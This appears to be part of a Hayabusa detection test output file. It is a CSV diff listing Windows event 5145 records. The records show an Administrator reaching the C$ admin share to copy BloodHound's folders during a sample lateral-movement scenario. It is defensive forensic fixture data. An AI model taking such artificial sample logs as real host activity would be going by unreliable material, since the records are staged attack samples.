+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
